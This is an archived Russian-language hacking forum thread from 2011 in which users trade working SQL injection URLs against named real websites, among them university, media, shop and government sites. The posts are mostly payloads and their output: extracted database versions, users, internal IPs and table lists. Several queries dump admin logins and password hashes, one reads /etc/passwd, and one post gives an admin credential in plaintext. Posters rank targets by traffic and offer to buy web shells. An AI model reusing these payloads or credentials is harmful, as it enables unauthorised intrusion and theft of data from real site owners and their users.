Просмотр полной версии : SQL Инъекции
Тиц1800, пр5, Blind mysqlinj, траф 7к+
Code:
http://www.vand.ru/index.php?country=64&sub=64+and(1)=1%23
version()>=5
_____________________
Траф 7к. Blind mysqlinj
Code:
http://www.2avia.ru/?p=hot&rai=2+and+1=1--
_____________________
Тиц900, пр4, 30к+ траф
Code:
http://old.mastercity.ru/news/news.php?sel_id=20100705172731 and null+UNION SELECT 1,2,3,4,5,version()--+
4.1.20-log
Code:
http://www.shinamir.ru/index.php?pageId=92222{SQLINJ}
Database Version: 5.0.90-log
Database name: u261330_shinamir
User name: u261330_shinamir@10.9.11.74
Code:
http://www.tgkoleso.ru/index.php?pageId=4
Database Version: 4.0.26-log
Database name: udb4037
User name: Uwww4037S@localhost
Code:
http://www.eurofamily.ru/french/?pageId=8111{SQLINJ}
Database Version: 5.0.77-log
Database name: eurofamily
User name: eurofamily@localhost
nemaniak
17.09.2011, 19:46
engr.msstate.edu PR-5
Code:
http://www.engr.msstate.edu/media/news/index.php?newsID=-512+union+select+1,concat_ws(0x3a,version(),user() ,database()),3,4,5,6,7,8,9,10,11,12+--+
Code:
5.0.45:admin@localhost:webdb
pakistantimes.net PR-5
Code:
http://pakistantimes.net/pt/detail.php?newsId=-22412+union+select+1,concat_ws(0x3a,version(),user (),database()),3,4,5,6,7,8,9,10,11+--+
Code:
5.0.77-log:ptdbuser@88.208.252.134:pakistantimes
themeparkreview.com PR-5
Code:
http://www.themeparkreview.com/parks/page.php?pageid=-368+union+select+1,2,3,concat_ws(0x3a,version(),us er(),database()),5,6+--+
Code:
5.1.40:freelance@localhost:themepar_parkphoto
(ответ в сорсе в теге )
Code:
http://www.inter-shina.ru/index.php?pageId=1111{SQLINJ}
Database Version: 5.0.90-log
Database name: u261330_inter
User name: u261330_inter@10.9.11.74
sourcec0de
18.09.2011, 21:56
http://old914.fc-zenit.ru/info/Video.phtml?id=1'+and+extractvalue(0x3b,concat(0x3 b,(select+concat_ws(0x3a,version(),user()))))--+&video=1
Skofield
18.09.2011, 22:16
Code:
http://www2.utah.edu/podcast/indivAudiocast.php?acId=-217'+union+select+1,2,3,4,5,6,7,8,version(),0,11,1 2,13,14,15,16/*
Database Version: 4.0.17-standard-log
Database name: podcast
User name: podcast_web@able.cc.utah.edu
http://wcfcourier.com/app/collegeguide/profile.php?campus=7+union+select+1,2,3,4,5,6,7,8, 9,10,11,concat_ws(0x3a,version(),user(),database() ),13,14--
4.0.24-standard:wcfcourier@10.1.10.200:wcfcourier_com
http://www.avtokraska.ru/news.php?id=76111{SQLINJ}
PR 2 ТИц 20
Database Version: 5.0.51a-24+lenny5
Database name: avtokraskaru_avtokraskaru
User name: avto_user@localhost
http://www.ttfinance.ru/news.php?id=4155111{SQLINJ}+
PR 4 ТИц 160
Database Version: 5.0.90-log
Database name: u24363
User name: u24363@10.8.0.107
http://worldsale.com.ua/news.php?id=16111{SQLINJ}&id_n=1612
PR 0 ТИц 0
Database Version: 5.1.57
Database name: worldsale
User name: worldsale@localhost
http://www.chocolate.rainford.ua/cgibin/news.php?id=83111{SQLINJ}
PR 2 ТИц 30
Database Version: 5.0.87
Database name: rain_malbi
User name: rain@localhost
http://job.aviso.ua/news.php?id=346322{SQLINJ}
2 Сайта на борту PR 5 ТИц 50 и PR 0 ТИц 10
Version 5.0.67
http://goodmp3.org.ua/news.php?id=66911{SQLINJ}
PR 1 ТИц 0
Database Version: 4.1.25-log
Database name: freemp3_slovo
User name: freemp3_slovo@192.168.1.7
http://www.automobile.com.ua/news.php?id=252222){SQLINJ}+
PR 1 ТИц 0
Database Version: 4.0.27-standard-log
Database name: fastrunn_automobile
User name: fastrunn_root@localhost
http://vslovo.com.ua/news.php?id=2022{SQLINJ}
PR 1 ТИц 0
Database Version: 5.1.43
Database name: vslovoco_vslovo
User name: vslovoco_vslovo@localhost
http://www.freemp3.org.ua/news.php?id=669222{SQLINJ}
Database Version: 4.1.25-log
Database name: freemp3_slovo
User name: freemp3_slovo@192.168.1.6
http://texnostar.org.ua/a-news/news.php?id=1401222{SQLINJ}
Database Version: 5.0.92-community-log
Database name: texnosta_texno
User name: texnosta_texno@localhost
P.S. приму в дар шеллы тиц 10-30 или выкуплю (спасибо)
http://www.kubinfo.ru/auto.php?mode=view&id=2181+union+select+name+from+users+where+id=user _id/*
http://spcformula.ru/auto/auto.php?id=1+union+select+name+from+users+where+i d=user_id/*
http://www.poderzhannye-tachki.ua/auto.php?id=2821+union+select+1,2,%27root%27,9,4,5 ,6,7,8,9,10--
Набранное вами сообщение слишком короткое. Увеличьте ваше сообщение до 4 символов.
http://www.sovazs.com/shownews.phtml?id=-1+union+select+1,2,3,4,password,login,7+from+acces s
тИц 150, пр 4
http://www.allbalances.ru/auto.php?id=19+or+1=%28SQL%20INJ%29%29--
Ваше сообщение слишком короткое. Оно должно быть не менее 4 символов
http://www.vel-es.ru/news.php?id=23522{SQLINJ}
Database Version: 5.0.70-log
Database name: gb_x_vel_es
User name: gb_x_vel_es@10.0.2.13
http://www.rubin69.ru/news.php?id=1922{SQLINJ}
Database Version: 5.0.26-log
Database name: rubin69
User name: rubin69@localhost
http://www.jetcharter.ru/new/news.php?id=65222{SQLINJ}
Database Version: 4.0.26
Database name: jetcharterru
User name: jetcharterru@62.213.73.13
http://www.astrakhanfm.ru/news/news.php?id=2552122{SQLINJ}
Похоже на офф сайт русского радио - астрахань
Database Version: 5.0.26-log
Database name: astrakhanru
User name: astrakhanru@localhost
Osstudio
19.09.2011, 23:16
http://www.sustainpack.com/news.php?id=-67%29+union+select+1,2,%28select%28@x%29from%28sel ect%28@x:=0x00%29,%28select%28null%29from%28inform ation_schema.columns%29where%28table_schema!=0x696 e666f726d6174696f6e5f736368656d61%29and%280x00%29i n%28@x:=concat%28@x,0x3c62723e,table_schema,0x2e,t able_name,0x3a,column_name%29%29%29%29x%29,4,5,6,7 ,8,9,10,11,12,13,14,15,16,17,18,19+--+
BD: db1081415_SustainPack
http://www.ajvengo.ru/news.php?id=43{SQLINJ}+
Database Version: 5.1.56-log
Database name: ajvengo_db
User name: ajvengo_user@localhost
http://elgaucho.ru/newsite/ru/news.php?id=150222{SQLINJ}+
Database Version: 5.1.41-log
Database name: elgaucho_elgaucho
User name: elgaucho_mysql@10.1.137.54
http://www.russianrugby.ru/news.php?Id=1002222{SQLINJ}+
Database Version: 5.1.56-log
Database name: russianr_site
User name: russianr_rugby@localhost
http://www.apc.ru/cgi-bin/news_full.cgi?id=102 6000 тиц
BLurpi^_^
20.09.2011, 19:52
Target: http://www.precisionbiologic.com/products/view_product.php?id=15'
Host IP: 209.68.16.133
Web Server: Apache/2.2.20
DB Server: MySQL >=5
Current User: precij4w_4@209.68.1.99
Sql Version: 5.0.91-log
пр=4
Target: http://promax.ie/view_product.php?id=12'
Host IP: 91.103.0.82
Web Server: Apache
Powered-by: PHP/5.2.4-2ubuntu5.17
DB Server: MySQL
Current User: promax@localhost
Sql Version: 5.0.51a-3ubuntu5.8-log
Current DB: promax
System User: promax@localhost
Host Name: lnxsrv01
Installation dir: /usr/
DB User: 'promax'@'localhost'
Data Bases: information_schema
promax
test_trackside
Target: http://psalmsoasis.com/view_product.php?id=8'
Host IP: 111.90.134.82
Web Server: Apache
Powered-by: PHP/5.2.17
DB Server: MySQL
Resp. Time(avg): 3535 ms
Current User: psalmsoa_db@localhost
Sql Version: 5.1.56-log
Current DB: psalmsoa_db
aydin-ka
20.09.2011, 21:26
тиЦ 750 PR 5 Трафик 1К
http://www.aen.ru/?page=brief&article_id=61491{SQLINJ}+
Current User: root@zvm14.host.ru
Sql Version: 5.0.87
Data Bases: information_schema
aen_ru
mysql
ТИЦ 450 PR 4
http://yarnovosti.com/index.php?mod=news&cid=13&id=32645{SQLINJ}+
Current User: yarnovos_novosti@localhost
Sql Version: 5.0.51a-24+lenny5-log
Data Bases: information_schema
yarnovos_novost
http://thegrooveexperience.com/?side=gall&year=2009&month=-5+union+select+1,2,3,4,concat_ws(0x3a,version(),da tabase(),user())--
5.0.91-log:thegroove:tanto@boscgi0503.eigbox.net
http://www.ruscombe.org/calendar_detail.php?id=10+UNION+SELECT+1,concat(us er_type,0x2e,user_username,0x3a,user_password),3,4 ,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+ from+users--
aydin-ka
21.09.2011, 19:48
ТИЦ 275 PR 6
http://www.sevtolib.iuf.net/index.php?id=2{SQLINJ}+
Current User: bibl@localhost
Sql Version: 5.1.51
Data Bases: information_schema
bibl
Cennarios
22.09.2011, 12:19
Просто хостер.
http://www.qlayer.net/press_center/id-99+union+select+1,user(),3,4,5.htm
http://www.indstate.EDU/cirt/et/techenh/display_room.php?id=-2+union+select+1,2,3,version(),5,6,7,8,9--
PR 7 тиц 160
USA универ.
есть табл. tblusers, wksp_user, wksp_student
http://php.amnuts.com/index.php?do=view&id=14&file=class.madlibs.php
PR 3
DB's
- amnuts_php2
- information_schema
Osstudio
22.09.2011, 18:23
http://uslugi.yandex.ru/banki/ipoteka/search.xml?sum=3000000¤cy=1&period=4&restrictions=0®ion=-213'+and+1=0+union+select+1,2,3,4,vErsIon(),usEr() ,daTabase(),8,9,10,11,12,13,14,15,16+--+
Version: 5.01+lenny
User: yandex@localhost
Database: uslugi_ya
Тиц: 250
PR: 0
http://www.mental-health-matters.com/index.php?option=com_content&view=article&id=171
PR 6
ТИЦ 20
db: mentalhealthmatters
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: option=com_content&view=article&id=171 AND 2065=2065
aydin-ka
23.09.2011, 00:21
ТИЦ 400 PR 5
http://www.chayka.org/article.php?id=3320{SQLINJ}+
Current User: dbo375381534@74.208.180.160
Sql Version: 5.0.91-log
Data Bases: information_schema
db375381534
http://www.shipsandports.org/Anews/moreheadlines.php?id=285-999.9+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4--
http://www.mediasoyuz.ru/news/index.php?id=932-999.9+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13--
DB: u230689
Osstudio
24.09.2011, 00:52
Code:
http://www.takagazete.com/kose_category.php?id=11+and+1=0+union+select+1,2,3 ,4,5,concat_ws%280x3a3a3a,version%28%29,user%28%29 ,database%28%29%29,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,28,29,30,31--
З.Ы Обратите внимание на title
http://www.porlock.co.uk/members/index.php?id=-00121+union+select+user%28%29,2--
http://knl.ua/img/titul.jpg
http://knl.ua/business.php?cat=1%20and%201-2%20union%20select%201,concat_ws(0x3a,@@version,us er(),database(),@@version_compile_os),3,4,5,6--
5.0.51a-24+lenny5-log u_allkremenc@localhost allkremenc debian-linux-gnu
Code:
http://www.fosa.biz/wp-admin/admin.php?page=people&action=printable&event_id=-15+union+select+0,1,2,concat_ws(0x3a,user_login,us er_pass),4+from+wp_users--
Code:
http://www.surgabali.biz/daftar_tour.php?kategoriID=-53+union+select+1,2,concat_ws(0x3a,version(),user( ),database()),4,5--
Военная тематика
Code:
http://www.ak-47.us/AK47-FAQ.php?id=-148)+or+1+group+by+concat(@@version,floor(rand(0)* 2))+having+min(0)+or+1+--+1
Тиц 10
PR 0
Шопы
Code:
http://www.smartdesignworldwide.com/work/print.php?id=135+and+1=2+union+select+1,2,version( ),4,5,6,7,8,9,10,11,12
Current User: smart_dev@localhost
Sql Version: 5.0.45
Current DB: smart
System User: smart_dev@localhost
Host Name: smartdesignworldwide.com
Installation dir: /usr/
DB User: 'smart_dev'@'%'
Data Bases: information_schema
smart
Тиц = не определяется =(
PR = не определяется =(
Code:
http://www.ruskinmoore.co.uk/cart/details.asp?ID=101356+and+1=1+union+select+1,2,3,c ount(pw),5,6,7,8,9,10,11,12,13,14,15,161,71,8,19+f rom+clients
DB Server: MSAccess
Resp. Time(avg): 910 ms
Web Root: c:\windows\system32\inetsrv\
На этом же хосте дофига других щопов UK
Code:
http://logowears.com/cart/landing.asp?ID=89+and+1=1+union+select+1,2,uUserna me,4,5,6,7,8,uPassword+from+tblusers
DB Server: MSAccess
Resp. Time(avg): 1465 ms
Web Root: C:\Windows\SysWOW64\inetsrv\
AHTNkiller
27.09.2011, 10:50
http://www.simka.by/shop.php?category=28&mode=detail&id=-1149%20UNION%20ALL%20SELECT%201,2,3,4,version%28%2 9,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--
Code:
http://carmartlanka.com/sell.php?id=-1+union+select+1,2,concat_ws(0x3a,uid,username,pas sword),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,2 0,21,22,23,24,25,26,27,28+from+tbl_admin
aydin-ka
27.09.2011, 23:59
тиЦ 20
PR 3
http://www.sizampskov.ru/news.php?id_new=99999+union+sel ect+1,2,3,4,5,concat_ws%280x3a,version%28%29,datab ase%28%29,us er%28%29%29,7,8,9--
Sql Version: 5.0.77
Data Bases: information_schema
sizampskov_sizam
PHP:
http://www.everestsports.com.au/headsweats/prod_det.php?recordID=-879+/*!UnIoN+SeLeCt*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,version(),17, 18,19,20,21--
version 5.1.56
Google PageRank: 6
Яндекс CY: 30
Code:
http://www.epdlp.com/director.php?id=4048'+union+select+1,2,3,4,5,6,7,8 ,9,10,11,version(),user(),14,15,16,17,18,19,20+--+
ver. 5.0.45
aydin-ka
29.09.2011, 19:07
ТИЦ 250 PR 4 Alexa Rank 246,434
http://www.nov osib.ru/market/site.php ?id=2166 &gid=99999999+UNION+SELECT+1,2,concat_ws(0x3a,user( ),version(),database()),4,5,6--
Data Bases: information_schema
novosib8_main
novosib8_mamba
novosib8_phpbb
winstrool
30.09.2011, 08:40
http://vrnplus.ru/street.php?id='-14'+union+select+1,concat_ws(0x3a,user(),version() ,database())+--+
betatron@v22.valuehost.ru:4.0.27-log:betatron
http://www.orencar.ru/orenburg/streets/street.php?id=-%CA'+union+select+1,2,concat_ws(0x3a,user(),versio n(),database()),4,5+--+
u44342@10.8.3.52:5.5.12-log:u44342_cars
Презервативы Contex с дырявой защитой
Италия
Вывод версии и юзверя
Code:
http://www.contex.lt/rus/link.php?lnk_id=999+UNION+ALL+SELECT+1,2,3,4,5,6,7 ,8,concat_ws(0x3a,user(),version()),10,11--
Current User: contex.lt@localhost
Sql Version: 5.1.33-log
Current DB: contex_lt
Data Bases: information_schema, contex_lt
Тиц = 0
PR = 4
Украина
Code:
http://contex.ua/link.php?lnk_id=39+and+1=2+union+select+1,2,3,4,5, 6,7,8,version(),10,11
Current User: contex@localhost
Sql Version: 5.0.90
Current DB: contex
Data Bases: information_schema
ameshkov
bareks
bunker
contex
deltabank
elevator
ford
gallery2
inpack
krus
krz
ksit
moodle
musicmama
mysql
ranok
rdm
star-k
synergia
Вышеперечисленные БД вот от этих сайтов;
Code:
krz.com.ua
star-k.com.ua
www.ford.com.ua
www.ford.ua
www.inpack.com.ua
www.kale-bareks.com.ua
www.kruss.com.ua
www.kruss.kiev.ua
www.krz.com.ua
www.naboo.viaduk.net
www.ranok.kiev.ua
www.rdm.com.ua
www.rdm.ua
www.synergia.ua
www.thyssenkrupp-elevator.com.ua
ТИЦ = 10
PR = 3
Болгария
Code:
http://bolgar.contex-condom.ru/link.php?lnk_id=49+and+1=2+union+select+1,2,3,4,5, 6,7,8,version(),10,11
Current User: u31847@10.8.1.182
Sql Version: 5.0.90-log
Current DB: u31847_bolgar
Data Bases: information_schema
u31847
u31847_2
u31847_bolgar
Тиц и PR по нулям оба
Латвия
Code:
http://www.contex.lv/link.php?lnk_id=17+and+1=1+union+select+1,2,3,4,5, 6,7,8,version(),10,11
Current User: contex@system1.hostex.lv
Sql Version: 4.0.27
Current DB: contex
Тиц = 0
PR = 4
http://computeremuzone.com/ficha.php?id=18 (60-80 юзеров онлайн)
крутил через havij, вручную не удалось... file_priv=y
vaddd said:
http://computeremuzone.com/ficha.php?id=18 (60-80 юзеров онлайн)
крутил через havij, вручную не удалось... file_priv=y
Молодёжь нынче не та =/ Всё на программы перекладывают...
А по сути всё просто
Code:
http://computeremuzone.com/ficha.php?id=9999+union+select+version(),2,3,4,5,6--
Current User: crisis@cgi1501.int.bizland.net
Sql Version: 5.0.91-log
Current DB: emuzonedb
Data Bases: information_schema
emuzonedb
eclipse92
01.10.2011, 13:40
http://www.dkggroup.com/main.php?id=121'
http://www.dkggroup.com/main.php?id=-121+union+all+select+1,group_concat(Username,0x3a, Password,0x3a,UserGroup),3,4,5+from+uvp_Users
тИЦ: 1600
Code:
http://www.solvex.ru/hot/list.php?uid=-22+union+select+1,concat_ws(0x3a,version(),databas e(),user()),3--+
ver 5.1.39
db solvexmdb
user root@localhost
file_priv y, mq = on
тиц 850
первенец
http://www.chelsi.ru/comment.php?idart=-11364+union+%0A+select+1,2,concat_ws%280x3a,email, password%29,4,5,6+from+users+--+
Учреждение Российской Академии Наук Институт Биологического Приборостроения
http://www.ibp-ran.ru/catalog.php?trid=-203%20and%201=2%20union%20select%201,2,3,4,5,conca t_ws(char(58),@@version,user(),database(),@@versio n_compile_os),7,8,9,10,11,12,13,14,15,16+--
4.0.27-log pse101@v27.valuehost.ru pse101 portbld-freebsd7.1
Уязвимость существует в get запросе http://www.bryansktel.ru/news/?idnews=121 из-за недостаточной фильтрации переменной idnews.
select+concat(login,0x3a,password,0x3a,level)+from +admins+limit+0,1
winstrool
03.10.2011, 02:01
http://turkupon.ru/articles.php?root=1'+union+select+1,2,concat_ws(0x 3a,user(),version(),database()),4,5+--+
grafrru_turkupon@localhost:5.1.50-lk-log:grafrru_turkupon
http://www.fishe.ru/diler.php?id=-10'+union+select+1,2,3,4,concat_ws(0x3a,user(),ver sion(),database())+--+
fisheru@localhost:5.0.26-lk-log:fisheru
http://kosmostom-omsk.ru/content.php?id=-21'+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,user (),version(),database()),9,0+--+
stomkosmos@localhost:5.0.26-log:stomkosmos
http://leohaus.ru/object.php?id=-59'+union+select+1,2,3,4,concat_ws(0x3a,user(),ver sion(),database()),6,7,8,9,0,11,12,13,14,15,16,17+--+
leohausru@localhost:5.0.26-log:leohausru
http://steklo55.ru/content.php?id=3'+and+(version()+like+'5%')+and(us er()+like+'steklo55ru%')+and+(database()+like+'ste klo55ru')+--+
http://art-reklama.com.ua/passport.php?id=-170+union+select+1,load_file(0x2f6574632f706173737 764),3,4,concat_ws(0x3a,user(),version(),database( )),(select(@x)from(select(@x:=0x00),(select(0)from (information_schema.columns)where(table_schema!=0x 696e666f726d6174696f6e5f736368656d61)and(0x00)in(@ x:=concat(@x,0x3c62723e,table_schema,0x2e,table_na me,0x3a,column_name))))x)+--+
art@localhost:5.1.58:art-reklama
Code:
http://kaluga.pizdec.net/downloadmp3/mp3.php?album_id=-1635978+union+Select+1,2,3,4,5,6,group_concat%28ta ble_name+separator+0x3a%29,8,9,10,11,12,13,14,15,1 6,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32, 33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49 ,50,51,52,53,54,55,56,57,58,59+from+information_sc hema.tables+where+table_schema=0x7a697073--
version: 5.0.77
database: zips
user: zips@localhost
Code:
http://foroli4ka.org.ua/aforism/index.php?id=1+and+substring%28@@version,1,1%29=5 //true
PHP:
http://www.kitana.ru/razdel.php?id=-1+union+select+1,2,3,group_concat(column_name+sepa rator+%27%3Cbr%3E%27)+from+information_schema.colu mns+where+table_schema=%27kitanaru%27+and+table_na me=%27user_profile%27--+
version - 5.0.45
kitanaru@localhost
тиц - 20
пр - 3
good.god
05.10.2011, 15:06
Code:
http://www.easyincometoday.co.uk/shop/ViewItem.php?ItemID=1'+and+1=0+union+select+1,grou p_concat(version(),0x3a,database()),3,4,5,6,7,8,9, 10,11,12,13,14,15,16+--+
5.0.51a-3ubuntu5:easyincome
AHTNkiller
05.10.2011, 15:09
http://www.autodostavka.ru/index.php?id=729&model=-981%20UNION%20ALL%20SELECT%201,2,3,4,5,6,group_con cat%28username,password%29,8,9,10,11,12%20from%20r egusers
http://shownewstv.ru/taunew/index.php?id=5227-999.9+union+select+1,2,3,4,version(),6,7,8,user(), 10,database(),12,13,14,15,16,17--
5.1.49-1ubuntu8.1
shownews@localhost
DB: wwwshownewstvru
http://avtozapchasty.ru/shop/i.php?id=288821-999.9+union+select+1,2,version(),4,5,6,user(),8,9, 10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--
5.5.16-log 6
cck135@WIN-BZW07G9C3OB
Code:
http://faq.freecity.de/support/faq_showfaq.phtml?id=-85+union+select+1,version()+--+&katname=K%C3%BCndigung
4.0.24_Debian-10sarge2-log
pr4
alexa 384,252
Code:
http://www.salue.de/nachrichten/message.phtml?id=-14895+union+select+1,2,3,4,5,6,7,8,9,10,concat_ws( 0x3a,version(),database(),user()),12,13,14,15,16,1 7,18,19,20,21+--+
pr 5
alexa 272,965
Code:
http://roston.cz/czechdjs/?section=karta&id=1+and+1=2+union+select+1,2,3,4,5,6,user(),0x61, 9,10,11,12,13,14,version(),database(),17,18,19+--+
так же идет opendir('foto/' . $_GET['id']), и инклудится файл inc-kalendar-10-2011.txt.
kravch_v
07.10.2011, 21:23
ГАЗклуб:
Code:
http://www.gazclub.ru/faq/?mess_id=-1+union+select+null,mysql.user.password,null,null+ from+mysql.user
u9884_2'@'10.8.1.198
PageRank - 0
Yandex тИЦ - 120
http://www.danielbank.kiev.ua/index.php?action=news&type=det&id=79{SQLINJ}
MySQL 5.2.2.
DataBase: danielbank
winstrool
10.10.2011, 18:28
Old School CMS 2010
root@vsevbanu.ru:5.0.51a-24+lenny4-log:vvb
http://www.vsevbanu.ru/post.php?id=-82+UnIon+selECt+1,concat_ws(0x3a,user(),version(), database()),(select(@x)from(select(@x:=0x00),(sele ct(0)from(information_schema.columns)where(table_s chema!=0x696e666f726d6174696f6e5f736368656d61)and( 0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e ,table_name,0x3a,column_name))))x),4,5,6,7,8,9,10+--+
Уязвимость пресутствует из-за отсутствия фильтрации данных в парамитре ID
post.php
if(!empty($_GET['id'])){$id =
$_GET['id']
;}
else $id = 1;
$show = $_GET['show'];
// вывод содержимого страницы;
$sql = "SELECT * FROM `pora` WHERE id =
$id
AND type = 'art'";
$result = mysql_query($sql);
$cont = mysql_fetch_object($result);
http://www.showbilet.ru/index.php?nav=1&page=3&id=-10%20and%201=2%20union%20select%201,concat_ws(char (58),@@version,user(),database(),@@version_compile _os),3,4,5,6,7,8,9,10--
4.0.27-log showbile@v27.valuehost.ru showbile portbld-freebsd7.1
aydin-ka
10.10.2011, 21:49
тиЦ 20 PR 2
http://weldteam.ru/pages.php?id=999999/*++*/union/*++*/select/*++*/concat_ws%280x3a,user%28%29,version%28%29,database %28%29%29,2,3+--+
dexx@localhost:5.0.51a-24+lenny5:dex
nemaniak
11.10.2011, 01:24
insanely-great.com PR-5
Code:
www.insanely-great.com/news.php?id=-11189+union+select+1,2,3,concat_ws(0x3a,version(), user(),database()),5,6,7,8,9,10,11,12,13,14,15,16, 17,18+--+
Code:
5.0.77-log:flamini_flaminio@216.14.208.109:flamini_igm
innovid.com PR-5
Code:
http://www.innovid.com/news.php?itemID=52+and+5=substring((SELECT+version ()),1,1)+--+
library.uni-altai.ru ТИЦ-180
Code:
library.uni-altai.ru/FullNews/shownew.php?num=-1253+union+select+1,2,3,concat_ws(0x3a,version(),u ser(),database()),5,6,7,8,9,10,11+--+
Code:
5.1.49-3-log:serg@localhost:libnews
Code:
http://www.nov-mvd.ru/GUVDpoNSO/Statistika?blogs2_id=552+limit+0+union+select+1,2, concat_ws%280x3a,user%28%29,version%28%29,database %28%29%29,4,5,6
Web Server: Apache/2.0.63-lk.d (Unix) mod_ssl/2.0.63-lk.d OpenSSL/0.9.8g mod_dp20/0.99.2 mod_python/3.3.1 Python/2.5.1 mod_ruby/1.2.6 Ruby/1.8.6(2007-09-24)
DB Server: MySQL
Current DB: notixshoru_mvd
Sidarovich1975
11.10.2011, 15:47
Code:
http://www.zebra.nsk.ru/index.php?page=lotinfo&id=-9277+union+select+1,2,concat_ws(0x3a3a3a,user(),ve rsion(),database()),4,5,6,7,8,9,10,11,12,13,14,15, 16,17,18,19,20,21,22,23,24,25,26,27,28+--+
zebransk_base@localhost:::5.1.50-rel11.4-log:::zebra777_base
aydin-ka
11.10.2011, 16:34
тиЦ 800 PR 5
http://vkirove.ru/catalog/index/?oid=-53%27%20UNION%20SELECT%201,2,CONCAT_ws%280x3a,user %28%29,version%28%29,database%28%29%29,4,5+--+
vns@localhost:5.1.53-log:www
тиЦ 160 PR 4
http://www.printmagazine.ru/market.php?id=-39+union+select+concat_ws%280x3a,user%28%29,databa se%28%29,version%28%29%29,2,3+--+
printmag@localhost:wwwprintmagazinr:4.1.25-log
тиЦ 30 PR 3
http://www.nostratic.ru/index.php?page=9999999+union+select+1,2,3,concat_w s%280x3a,user%28%29,version%28%29,database%28%29%2 9,5,6,7+--+
200148610@localhost:4.1.25-log:db00148610
тиЦ 30 PR 3
http://www.feromon.ru/?fm=0&categoryID=111%20and%200%20union%20select%201,conc at_ws%280x3a,user%28%29,version%28%29,database%28% 29%29,3+--+
u25499@10.8.0.155:5.0.90-log:u25499
не знаю куда постить админки и запостил тут!
Code:
http://www.konkir.ru/
модеры если у меня глаза не видят то сорри,перенесите туда где должно быть!
root:market2004
aydin-ka
12.10.2011, 17:34
тиЦ 1000 PR 4
http://maxybaby.net.ua/index.php?loc=detskie-stihi-i-pesenki&stih=120%20and%201=0%20union%20select%201,2,3,4,5, concat_ws%280x3a,user%28%29,database%28%29,version %28%29%29+--+
maxybaby_root@localhost:maxybaby_maximka:5.0.51a-24+lenny5 "4"
Равнодушным к РУ-АвтоПрому посвящается...
www.la[g]da.ru
PR/TYC = 6/1700
DB: Oracle
Базы
Code:
http://www.la[g]da.ru/carco[g]lors.php?ba[g]se_id=6295171 AND ASCII(SUBSTR((SELECT NVL(CAST(COUNT(DISTINCT(OWNER)) AS VARC[g]HAR(4000)),CHR(32)) FROM SYS.ALL_TABLES),1,1)) > 51
Таблицы
Code:
http://www.la[g]da.ru/ca[g]rcolors.php?ba[g]se_id=6295171 AND ASCII(SUBS[g]TR((SELECT NVL(CAST(TABLE_NAME AS VARCHAR(4000)),CHR(32)) FRO[g]M (SELECT TABLE_NAME,ROWNUM AS LIMIT FROM SYS.ALL_TABLES WHERE OWNER=CHR(68)||CHR(83)||CHR(79)) WHERE LIMIT=4),6,1)) = 68
Колонки
Code:
http://www.la[g]da.ru/carco[g]lors.php?ba[g]se_id=6295171 AND ASCII(SUBSTR((SEL[g]ECT NVL(CAST(COUNT(COLUMN_NAME) AS VARCHAR(4000)),CHR(32)) FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME=CHR(68)||CHR(90)||CHR(79)||CHR(95)||CHR (85)||CHR(83)||CHR(69)||CHR(82)),1,1)) > 48
[PHP]
PHP:
[COLOR="#0000BB"]databases[9]:
CTXSYS
DSO[COLOR="#007700"]
nemaniak
13.10.2011, 01:55
willkommen-tv.at PR-5
Code:
http://www.willkommen-tv.at/artikel.php?id=8+and+1=2+union+select+1,2,3,4,5,co ncat_ws(0x3a,version(),user(),database()),7,8,9+--+
Code:
4.0.27inode:wi000142_0001@nat.ubh.inode.at:wi00014 2_0001
netporn.nl alexa-34k
Code:
http://www.netporn.nl/uprofile.php?UID=70796+and+5=substring((SELECT+ver sion()),1,1)
surfbirds.com PR-5
Code:
http://surfbirds.com/video2/uprofile.php?UID=1045+UnIon+selECt+1,2,concat_ws(0 x3a,version(),user(),database()),4,5,6,7,8,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,2 8,29,30,31+--+
Code:
5.0.83-rs-log:surfbirds_vshare@localhost:surfbirds_videoshar e
OxoTnik said:
когда лезешь дальше, сайт отвергает мой запросы
Но там есть форум phpBB, тоесть можно просто на угад вытащить типа
Code:
http://www.ma3da.ru/news.php?news_id=-862+union+select+1,2,concat_ws%280x3a,user_id,user _password, username%28%29%29,4,5,6,7,8,9,10,11,12,13,14,15,16 +from+phpbb_users--
Сорри за небольшой флуд, НО...
Уважаемый, на каких предположениях Вы говорите, что там есть вышесцитированная таблица, если вам режет все запросы хостер ? Пальцем в небо ??
В случае, когда хостер блокирует запросы, нам ничего не мешает применять метод слепой инъекции и орудовать полученными данными.
Нет там никакой таблички phpbb_users, зато есть forum_users
Даже скажу больше - в табличке forum_users аж 10690 записей.
Судите сами
PHP:
http://www.ma3da.ru/news.php?news_id=999999.9+or+ascii(substring((SELE CT+count(*)+FROM+ma3daru.forum_users),1,1))=49
http://www.ma3da.ru/news.php?news_id=999999.9+or+ascii(substring((SELE CT+count(*)+FROM+ma3daru.forum_users),2,1))=48
http://www.ma3da.ru/news.php?news_id=99999+or+ascii(substring((SELECT+ count(*)+FROM+ma3daru.forum_users),3,1))=54
http://www.ma3da.ru/news.php?news_id=99999+or+ascii(substring((SELECT+ count(*)+FROM+ma3daru.forum_users),4,1))=57
http://www.ma3da.ru/news.php?news_id=99999+or+ascii(substring((SELECT+ count(*)+FROM+ma3daru.forum_users),5,1))=48
aydin-ka
13.10.2011, 16:18
тиЦ 650 PR 5
Code:
http://zvezda.ru/news_read.php?id=-9999999/**/union/**/select/**/concat_ws%280x3a,user%28%29,database%28%29,version %28%29%29,2,3,4,5,6,7,8,9+--+
antares_user@localhost:antares_DB:5.0.92-community
Code:
http://zvezda.ru/news_read.php?id=-9999999/**/union/**/select/**/group_concat%28table_name%29,2,3,4,5,6,7,8,9/**/from/**/information_schema.tables+--+
http://tambov.er.ru/shownew.php?id=-969 union select 1,2,3,4,5
Единая Россия. Тамбов.
aydin-ka
15.10.2011, 15:17
